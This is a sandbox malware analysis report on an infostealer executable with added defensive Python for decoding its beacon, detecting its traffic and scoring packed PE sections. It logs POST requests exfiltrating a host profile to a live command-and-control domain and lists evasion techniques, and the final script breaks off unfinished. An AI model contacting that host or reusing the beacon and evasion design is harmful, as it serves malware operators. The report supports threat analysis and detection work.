
Windows Analysis Report
QMtCX5RLOP.exe

Overview

General Information

Sample name: QMtCX5RLOP.exe (renamed because the original name is a hash value)
Original sample name: 3657bc0028f37da206a1530aa895f62e.exe
Analysis ID: 1581598
MD5: 3657bc0028f37da206a1530aa895f62e
SHA1: b23e3ac015967159f244b2ab5dde165232a797d9
SHA256: 85aca9b9c7eed56fcd7f62f7775c4e16555532497a7a657a8973f7dfc9e791ca
Tags: exe, user-abuse_ch

Detection

Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • QMtCX5RLOP.exe (PID: 2336 cmdline: "C:\Users\user\Desktop\QMtCX5RLOP.exe" MD5: 3657BC0028F37DA206A1530AA895F62E)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: QMtCX5RLOP.exe | Avira: detected
Source: QMtCX5RLOP.exe | Virustotal: Detection: 45%
Source: QMtCX5RLOP.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: QMtCX5RLOP.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: -----BEGIN PUBLIC KEY----- 0_2_00D6DCF0
Source: QMtCX5RLOP.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: QMtCX5RLOP.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00D4255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00D429FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Networking

Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1; Host: httpbin.org; Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*; Content-Type: application/json; Content-Length: 501797; Data Ascii (the report's Data Raw hex dump decoded to ASCII; the dump is cut off mid-object): { "ip": "8.46.123.189", "current_time": "8532915458317203975", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, [dump truncated in the report]
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*; Content-Type: application/json; Content-Length: 143; Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
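The half-megabyte POST above is the host profile the sample collects (public IP as returned by the preceding httpbin.org/ip lookup, CPU and RAM counts, drive sizes, display geometry, recent-file count and a full process list) serialized as one JSON document, which the report prints only as a hex dump cut off mid-object. The Python below is an added example written for this page, not code from the sample or from Joe Sandbox: it decodes such a dump, repairs the truncation by cutting back to the last complete JSON element and closing the containers still open, and summarizes the fields. The embedded hex is a constructed, shortened excerpt of the dump above (same keys and values, most of the process list left out).

```python
import json

# Constructed, shortened excerpt of the "Data Raw" dump shown above: same field
# order and values as the report, most of the process list left out, and the
# dump cut mid-object the way the report cuts it (the report's dump even ends
# in a half byte, "2c 2", which decode_data_raw() tolerates).
SAMPLE_HEX = (
    "7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c "
    "20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 "
    "34 35 38 33 31 37 32 30 33 39 37 35 22 2c "
    "20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c "
    "20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c "
    "20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 "
    "22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c "
    "20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c "
    "20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c "
    "20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c "
    "20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c "
    "20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c "
    "20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b "
    "20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c "
    "20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c "
    "20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c "
    "20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c "
    "20 7b 20 22 6e 61 6d 65 22 3a 20 2"
)


def decode_data_raw(hex_dump: str) -> str:
    """Turn the report's space-separated hex into text; a dangling half byte at
    the end (the dump is cut at a fixed length) is dropped instead of raising."""
    tokens = hex_dump.split()
    if tokens and len(tokens[-1]) != 2:
        tokens.pop()
    return bytes.fromhex("".join(tokens)).decode("utf-8", errors="replace")


def repair_truncated_json(text: str) -> str:
    """Cut a truncated JSON document back to its last complete element and close
    every container still open, so json.loads() accepts it. Whatever followed
    the last closing bracket (an unfinished object, a half key) is dropped."""
    stack, in_string, escaped = [], False, False
    last_good, open_at_last_good = 0, []
    for i, ch in enumerate(text):
        if in_string:                      # skip string bodies, honouring escapes
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch in "{[":
            stack.append(ch)
        elif ch in "}]":
            if stack:
                stack.pop()
            last_good, open_at_last_good = i + 1, list(stack)
    if last_good == 0:
        raise ValueError("no complete JSON element in dump")
    head = text[:last_good].rstrip().rstrip(",")
    closers = {"{": "}", "[": "]"}
    return head + "".join(closers[c] for c in reversed(open_at_last_good))


def summarize_beacon(hex_dump: str) -> dict:
    """Decode one captured POST body and pull out the fields an analyst wants
    for an IOC write-up."""
    text = decode_data_raw(hex_dump)
    try:
        doc, truncated = json.loads(text), False
    except json.JSONDecodeError:
        doc, truncated = json.loads(repair_truncated_json(text)), True
    return {
        "public_ip": doc.get("ip"),        # presumably the httpbin.org/ip answer
        "num_processor": doc.get("Num_processor"),
        "num_ram": doc.get("Num_ram"),
        "drives": {d["name"]: (d["all"], d["free"]) for d in doc.get("drivers", [])},
        "processes": [p["name"] for p in doc.get("processes", [])],
        "truncated": truncated,
    }


if __name__ == "__main__":
    print(json.dumps(summarize_beacon(SAMPLE_HEX), indent=2))
```

The repair step is deliberately lossy: it keeps only elements that were closed before the cut, so a process-list entry that the dump splits in half is discarded rather than guessed at, and the `truncated` flag records that the summary is incomplete.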
Source: Joe Sandbox View | IP Address: 34.226.108.155
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 8 times)
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00D47770 recv
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1; Host: httpbin.org; Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5ht.top
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: QMtCX5RLOP.exe, 00000000.00000002.1828476400.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: QMtCX5RLOP.exe, 00000000.00000002.1828476400.00000000007EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1
Source: QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: QMtCX5RLOP.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: QMtCX5RLOP.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: QMtCX5RLOP.exe, QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: QMtCX5RLOP.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
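The network sequence in this section (a GET to httpbin.org/ip to learn the victim's public address, then JSON POSTs with no User-Agent header to a fresh hostname, the first of them half a megabyte) is what the signature "HTTP GET or POST without a user agent" points at, and the curl.se documentation URLs in the strings above are consistent with an embedded libcurl client, which sends no User-Agent unless the program sets one. The pattern is detectable from proxy or Zeek-style HTTP logs without payload inspection. The Python below is an added example, not part of the report: it correlates a public-IP lookup with a following user-agent-less JSON POST from the same client inside a 60-second window and separately flags exfiltration-sized uploads. The JSON-lines log, the client addresses and the IP-echo services other than httpbin.org are constructed for the example.

```python
import json

# Constructed JSON-lines HTTP log modelled on the traffic in the report above.
# Timestamps and the two client addresses are made up; hosts, URIs and body
# sizes in the first three lines are taken from the report, the rest is benign
# filler that the rules must not flag.
SAMPLE_LOG = """\
{"ts": 1735186860.1, "src": "10.0.0.25", "method": "GET", "host": "httpbin.org", "uri": "/ip", "user_agent": "", "content_type": "", "request_body_len": 0}
{"ts": 1735186862.4, "src": "10.0.0.25", "method": "POST", "host": "home.fiveth5ht.top", "uri": "/OyKvQKriwnyyWjwCxSXF1735186862", "user_agent": "", "content_type": "application/json", "request_body_len": 501797}
{"ts": 1735186863.0, "src": "10.0.0.25", "method": "POST", "host": "home.fiveth5ht.top", "uri": "/OyKvQKriwnyyWjwCxSXF1735186862", "user_agent": "", "content_type": "application/json", "request_body_len": 143}
{"ts": 1735186870.0, "src": "10.0.0.31", "method": "GET", "host": "www.example.com", "uri": "/", "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "content_type": "", "request_body_len": 0}
{"ts": 1735186871.0, "src": "10.0.0.31", "method": "POST", "host": "api.example.com", "uri": "/v1/telemetry", "user_agent": "ExampleAgent/2.1", "content_type": "application/json", "request_body_len": 2048}
{"ts": 1735186880.0, "src": "10.0.0.31", "method": "POST", "host": "api.example.com", "uri": "/v1/upload", "user_agent": "", "content_type": "application/octet-stream", "request_body_len": 9000}
"""

# httpbin.org is the service the sample used; the others are assumed additions
# (commonly used public-IP echo endpoints), extend to taste.
IP_ECHO_HOSTS = {"httpbin.org", "api.ipify.org", "ifconfig.me", "icanhazip.com", "ipinfo.io"}
BEACON_WINDOW_SECONDS = 60.0
LARGE_BODY_BYTES = 100_000


def parse_log(text: str) -> list:
    """One dict per line, ordered by timestamp so the correlation below is causal."""
    return sorted((json.loads(ln) for ln in text.splitlines() if ln.strip()),
                  key=lambda e: e["ts"])


def _alert(e: dict, rule: str, severity: str) -> dict:
    return {"rule": rule, "severity": severity, "ts": e["ts"], "src": e["src"],
            "host": e["host"], "uri": e["uri"], "bytes": e["request_body_len"]}


def detect(log_text: str) -> list:
    alerts = []
    last_ip_check = {}          # client -> timestamp of its latest public-IP lookup
    for e in parse_log(log_text):
        if e["host"] in IP_ECHO_HOSTS:
            last_ip_check[e["src"]] = e["ts"]
            continue
        if e["method"] != "POST":
            continue
        if e["user_agent"] or not e["content_type"].startswith("application/json"):
            continue
        # Rule 1: a JSON POST with no User-Agent at all. Browsers and nearly every
        # SDK send one; bare libcurl does not. Low severity on its own (scripts do this).
        alerts.append(_alert(e, "json_post_without_ua", "low"))
        # Rule 2: the same client asked an IP-echo service for its address moments
        # earlier, the "learn my public IP, then report in" order seen in the sandbox.
        t = last_ip_check.get(e["src"])
        if t is not None and 0.0 <= e["ts"] - t <= BEACON_WINDOW_SECONDS:
            alerts.append(_alert(e, "ipcheck_then_beacon", "high"))
        # Rule 3: hundreds of kilobytes on a UA-less JSON POST is exfiltration-sized.
        if e["request_body_len"] >= LARGE_BODY_BYTES:
            alerts.append(_alert(e, "large_json_upload_without_ua", "medium"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f'{a["severity"]:6} {a["rule"]:30} {a["src"]} -> {a["host"]}{a["uri"]} ({a["bytes"]} bytes)')
```

Rule 1 alone is noisy, which is why the sequence in rule 2 carries the severity: an IP-echo lookup immediately followed by a UA-less JSON POST to a host the client has no other business with is rarely legitimate, whereas the missing User-Agent by itself is common in scripted traffic.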

System Summary

Source: QMtCX5RLOP.exe | Static PE information: section name: [blank in report]
Source: QMtCX5RLOP.exe | Static PE information: section name: .idata
Source: QMtCX5RLOP.exe | Static PE information: section name: [blank in report]
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_3_00889390 (reported 16 times)
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code functions: 0_2_00E0B180, 0_2_00D505B0, 0_2_00D56FA0, 0_2_00E100E0, 0_2_00D510E6, 0_2_010CA000, 0_2_010CE050, 0_2_00DA6210, 0_2_00E0C320, 0_2_010B35B0, 0_2_00E10420, 0_2_01094410, 0_2_010AD430, 0_2_010A6730, 0_2_010C4780, 0_2_010D17A0, 0_2_00D4E620, 0_2_00E0C770, 0_2_010956D0, 0_2_01099920, 0_2_00DF9880, 0_2_00D54940, 0_2_00D4A960, 0_2_00DFC900, 0_2_00F16AC0, 0_2_010B1BD0, 0_2_010B8BF0, 0_2_00D81BE0, 0_2_00D4CBB0, 0_2_010C3A70, 0_2_010C4D40, 0_2_010BCD80, 0_2_00D55DB0, 0_2_010CCC90, 0_2_010A7CC0, 0_2_00D53ED0, 0_2_00D65EB0, 0_2_01092F90, 0_2_0105AE30, 0_2_00E0EF90, 0_2_00E08F90, 0_2_00D64F70
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: String function: 00D4CAA0 appears 41 times
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: String function: 00D471E0 appears 42 times
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: String function: 00E244A0 appears 72 times
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: String function: 00D84FD0 appears 200 times
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: String function: 00EF7220 appears 82 times
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: String function: 00D85340 appears 38 times
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: String function: 00D473F0 appears 86 times
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: String function: 00D84F40 appears 199 times
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: String function: 00D475A0 appears 530 times
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: String function: 00F1CBC0 appears 95 times
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: String function: 00D850A0 appears 31 times
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: String function: 00D5CCD0 appears 40 times
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: String function: 00D5CD40 appears 40 times
Source: QMtCX5RLOP.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: QMtCX5RLOP.exe | Static PE information: Section: omzymeri ZLIB complexity 0.9944679890996603
Source: QMtCX5RLOP.exe | Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instruction diversity: 0.5
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00D4255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00D431D7 CreateToolhelp32Snapshot, CloseHandle
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 4 times)
Source: QMtCX5RLOP.exe | Virustotal: Detection: 45%
Source: QMtCX5RLOP.exe | ReversingLabs: Detection: 57%
Source: QMtCX5RLOP.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: QMtCX5RLOP.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Sections loaded, in order: apphelp.dll, winmm.dll, iphlpapi.dll, cryptbase.dll, cryptsp.dll, rsaenh.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, winrnr.dll, uxtheme.dll, windows.storage.dll, wldp.dll, windowscodecs.dll, kernel.appcore.dll (napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll and winrnr.dll were reported loaded a second time, after windowscodecs.dll)
Source: QMtCX5RLOP.exe | Static file information: File size 4480512 > 1048576
Source: QMtCX5RLOP.exe | Static PE information: Raw size of [blank-named section] (0x288a00) exceeds 0x100000
Source: QMtCX5RLOP.exe | Static PE information: Raw size of omzymeri (0x1b9800) exceeds 0x100000

Data Obfuscation

Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Unpacked PE file: 0.2.QMtCX5RLOP.exe.d40000.0.unpack; section rights as listed in the report (first list vs second list): [blank]: EW vs ER; .rsrc: W vs W; .idata: W vs W; [blank]: EW vs EW; omzymeri: EW vs EW; rconqxqs: EW vs EW; .taggant: EW vs EW (only the first, blank-named section differs: it gains write access)
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: QMtCX5RLOP.exe | Static PE information: real checksum: 0x454fe3 should be: 0x44962b
Source: QMtCX5RLOP.exe | Static PE information: section name: [blank in report]
Source: QMtCX5RLOP.exe | Static PE information: section name: .idata
Source: QMtCX5RLOP.exe | Static PE information: section name: [blank in report]
Source: QMtCX5RLOP.exe | Static PE information: section name: omzymeri
Source: QMtCX5RLOP.exe | Static PE information: section name: rconqxqs
Source: QMtCX5RLOP.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_008780C8 push eax; retf 0_3_008780C9
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_010C41D0 push eax; mov dword ptr [esp], edx | 0_2_010C41D5
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00DA1430 push eax; mov dword ptr [esp], 00000000h | 0_2_00DA1433
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00DFC7F0 push eax; mov dword ptr [esp], 00000000h | 0_2_00DFC743
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00DC39A0 push eax; mov dword ptr [esp], 00000000h | 0_2_00DC39A3
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe | Code function: 0_2_00D80AC0 push eax; mov dword ptr [esp], 00000000h | 0_2_00D80AC4
Source: QMtCX5RLOP.exe | Static PE information: section name: omzymeri entropy: 7.954409366201115
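The entropy figure in the static check above is the usual packer tell: a section whose bytes are close to uniformly distributed (7.95 bits per byte out of a possible 8.0) is compressed or encrypted data that gets unpacked at run time, and the non-standard section name "omzymeri" points the same way. The script below reproduces that triage step as an added example; it is not Joe Sandbox code. It parses the PE section table directly (no pefile dependency), scores each section's raw bytes with Shannon entropy, and flags non-standard or non-printable names and sections that are both writable and executable. The PE image it runs on is constructed in memory so the example works offline; the 7.0 threshold and the list of "standard" section names are the author's assumptions.

```python
"""Section-entropy triage for a PE file (added example, not sandbox code)."""
import math
import random
import struct

# Names a linker normally emits; anything else is worth a look (assumed list).
STANDARD_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".pdata",
                  ".rsrc", ".reloc", ".bss", ".tls", ".CRT", ".gfids"}
HIGH_ENTROPY = 7.0   # assumed threshold: packed/encrypted data sits near 8.0
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty or constant input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes):
    """Walk the section table of a PE image and score each raw section."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER
    nsections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size             # first IMAGE_SECTION_HEADER
    out = []
    for i in range(nsections):
        hdr = image[table + 40 * i: table + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)   # SizeOfRawData, PointerToRawData
        chars = struct.unpack_from("<I", hdr, 36)[0]             # Characteristics
        ent = shannon_entropy(image[raw_ptr: raw_ptr + raw_size])
        text = name.decode("latin-1")
        flags = []
        if any(c < 0x20 or c > 0x7E for c in name):
            flags.append("special_chars")
        if text not in STANDARD_NAMES:
            flags.append("nonstandard_name")
        if ent >= HIGH_ENTROPY:
            flags.append("high_entropy")
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            flags.append("writable_and_executable")
        out.append({"name": text, "raw_size": raw_size, "entropy": round(ent, 3), "flags": flags})
    return out


def build_sample_pe(sections) -> bytes:
    """Constructed minimal PE32 image (DOS stub, COFF header, zeroed optional
    header, section table, raw data at 0x200). Test data, not a loadable file."""
    opt_size = 0xE0
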